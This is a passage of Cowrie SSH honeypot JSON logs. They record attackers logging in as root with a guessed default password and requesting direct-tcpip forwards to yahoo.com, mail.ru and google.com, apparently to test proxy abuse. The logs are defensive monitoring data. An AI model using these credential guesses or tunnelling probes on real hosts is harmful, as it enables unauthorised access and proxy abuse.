b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x80\\xb4aA\\x927E%KP\\xf8\\xcf\\xe2\\xd0\\xf1\\xe0\\x1a\\x06\\xc1i\\x86\\xcb\\xd3\\x81Ty\\xa8\\xb9fi\\x99\\xb9 l\\xcdS\\xed\\xe2I\\xe7\\xc0\\x1f\\xda\\xab\\x01\\xb9\\xd4\\x91\\x02\\xaa\\xea\\xca\\x97\\xca\\xa6\\x03\\xb4\\xc92\\x91\\xed\\xc5\\xde\\xc9c\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x08\\rI\\x1a\\xf5\\xca\\xc6&6\\xf3\\xfeg\\x19\\xed]*\\xedt&\\xa0\\x04\\x9d\\xc7\\xaa\\x91\\xdd).\\xe57*^\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.702473Z","src_ip":"194.0.234.21","session":"bf9045e13ca7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":13776,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13776","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.744394Z","session":"3c1c362de6e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"194.0.234.21","src_port":32990,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:32990","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.762952Z","session":"bf9045e13ca7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.794756Z","src_ip":"77.83.207.83","session":"3c1c362de6e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x97\\xe3\\xf1\\n\\x1d\\x86\\x12\\xbc\\xf7\\xe4rV\\xc4\\t\\xed-3F\\x7fj-\\xd0\\x90\\xd8zw\\r\\x1b\\xa0\\x1e7\\xaa -\\xd0!>,\\xa5\\xb1\\x87\\'\\xcb\\x03\\xe7\\x05\\xf9\\xcb\\xec\\x94\\x9f\\x1e\\xcd\\xf5\\x8d\\xa5\\xd0Z\"\\xbbH\\xde)\\xd8\\xde\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 9\\xbaJ#\\xa5\\xe4\\xc5\\xbc\\xe5\\xb4y&\\x83\\xeaE\\xd8y\\xb2\\xb4\\x04\\x11z\\xd6|\\xe8{\\x13\\x81j_\\x02]\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.203.132:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x97\\xe3\\xf1\\n\\x1d\\x86\\x12\\xbc\\xf7\\xe4rV\\xc4\\t\\xed-3F\\x7fj-\\xd0\\x90\\xd8zw\\r\\x1b\\xa0\\x1e7\\xaa -\\xd0!>,\\xa5\\xb1\\x87\\'\\xcb\\x03\\xe7\\x05\\xf9\\xcb\\xec\\x94\\x9f\\x1e\\xcd\\xf5\\x8d\\xa5\\xd0Z\"\\xbbH\\xde)\\xd8\\xde\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 9\\xbaJ#\\xa5\\xe4\\xc5\\xbc\\xe5\\xb4y&\\x83\\xeaE\\xd8y\\xb2\\xb4\\x04\\x11z\\xd6|\\xe8{\\x13\\x81j_\\x02]\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.827304Z","src_ip":"194.0.234.21","session":"bf9045e13ca7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.844636Z","src_ip":"194.0.234.21","session":"bf9045e13ca7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.845738Z","src_ip":"77.83.207.83","session":"3c1c362de6e0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":27768,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac368b050880","protocol":"ssh","message":"New connection: 77.83.207.83:27768 (1.2.3.4:22) [session: ac368b050880]","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.894840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.895655Z","src_ip":"77.83.207.83","session":"ac368b050880"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:58.945565Z","src_ip":"77.83.207.83","session":"ac368b050880"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.194601Z","src_ip":"77.83.207.83","session":"ac368b050880"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28674,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:28674","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.245879Z","session":"ac368b050880"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.296042Z","src_ip":"77.83.207.83","session":"ac368b050880"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8030,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:8030","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.436463Z","session":"ac368b050880"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.487117Z","src_ip":"77.83.207.83","session":"ac368b050880"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":1594,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1594","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.628515Z","session":"ac368b050880"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.678818Z","src_ip":"77.83.207.83","session":"ac368b050880"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.729966Z","src_ip":"77.83.207.83","session":"ac368b050880"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":27882,"dst_ip":"1.2.3.4","dst_port":22,"session":"460fe3d3737a","protocol":"ssh","message":"New connection: 77.83.207.83:27882 (1.2.3.4:22) [session: 460fe3d3737a]","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.779057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.779681Z","src_ip":"77.83.207.83","session":"460fe3d3737a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:59.830069Z","src_ip":"77.83.207.83","session":"460fe3d3737a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.080529Z","src_ip":"77.83.207.83","session":"460fe3d3737a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9752,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9752","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.131522Z","session":"460fe3d3737a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.181737Z","src_ip":"77.83.207.83","session":"460fe3d3737a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":15520,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15520","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.324615Z","session":"460fe3d3737a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.374875Z","src_ip":"77.83.207.83","session":"460fe3d3737a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":17770,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17770","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.516508Z","session":"460fe3d3737a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.566744Z","src_ip":"77.83.207.83","session":"460fe3d3737a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.617586Z","src_ip":"77.83.207.83","session":"460fe3d3737a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28000,"dst_ip":"1.2.3.4","dst_port":22,"session":"cef758243919","protocol":"ssh","message":"New connection: 77.83.207.83:28000 (1.2.3.4:22) [session: cef758243919]","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.667074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.668017Z","src_ip":"77.83.207.83","session":"cef758243919"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.718132Z","src_ip":"77.83.207.83","session":"cef758243919"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:00.969037Z","src_ip":"77.83.207.83","session":"cef758243919"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3874,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3874","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.020146Z","session":"cef758243919"}
